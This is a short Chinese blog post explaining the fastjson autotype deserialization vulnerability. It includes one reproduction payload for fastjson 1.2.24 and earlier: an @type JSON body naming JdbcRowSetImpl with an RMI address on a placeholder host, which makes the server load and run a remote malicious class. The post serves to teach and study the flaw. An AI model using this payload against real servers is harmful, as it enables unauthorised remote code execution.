热门标签
热门文章
- 1软件设计师考试知识点总结(全)_软件设计师知识点
- 2AI浪潮下的“首届”奥运会!巴黎2024开幕在即,AI运动员助手、AI裁判员齐上场
- 3Verilog状态机常见三种写法_verilog状态机代码书写例子
- 4git clone报错 fatal: unable to access X: OpenSSL SSL_read: SSL_ERROR__SYSCALL, errno 0 的解决方案_git fatal unable to access openssl ssl read ssl er
- 5配置Hive元数据到Mysql数据库显示缺少com.mysql.jdbc.Driver类,需要下载mysql-connector-java-<version>.jar相关包,Hive初始化元数据错误
- 6Hadoop集群安装配置教程_Hadoop2.6.0_UbuntuCentOS(林子雨教授,超级详细)_厦门大学林子雨hadoop集群
- 7泊松算法足球比分模型计算原理介绍_matlab足球比分建模
- 8Python GUI 编程(一)
- 9git 新建本地分支,并将该分支推送至远程服务器_git 本地新建分支推送到远程
- 10UniPro、PingCode、禅道,CTO如何选择合适的项目管理软件
当前位置: article > 正文
fastjson反序列化漏洞_fastjson2 autotype json.parse 反序列化
作者:在线问答5 | 2024-08-09 14:59:44
赞
踩
fastjson2 autotype json.parse 反序列化
目录
前言
fastjson是阿里开发的json解析库,可以将java对象解析为json,也可以将json反序列化为java对象,主要用json.parse()方法进行反序列化。
一、漏洞原理
由于fastjson存在autotype功能,若开启了autotype功能(即autoTypeSupport=True),那么就可以引用@type指定反序列化的类,而若类中使用了json.parse()反序列化了恶意数据,那么就会造成任意代码执行。
二、漏洞复现
2.1 fastjson<=1.2.24
可以直接抓包发送@type格式的json数据,fastjson会调用指定的类然后运行远程恶意class文件
如{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
指定反序列化com.sun.rowset.JdbcRowSetImpl类,然后利用rmi远程获取poc执行恶意代码。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/在线问答5/article/detail/953837
推荐阅读
相关标签
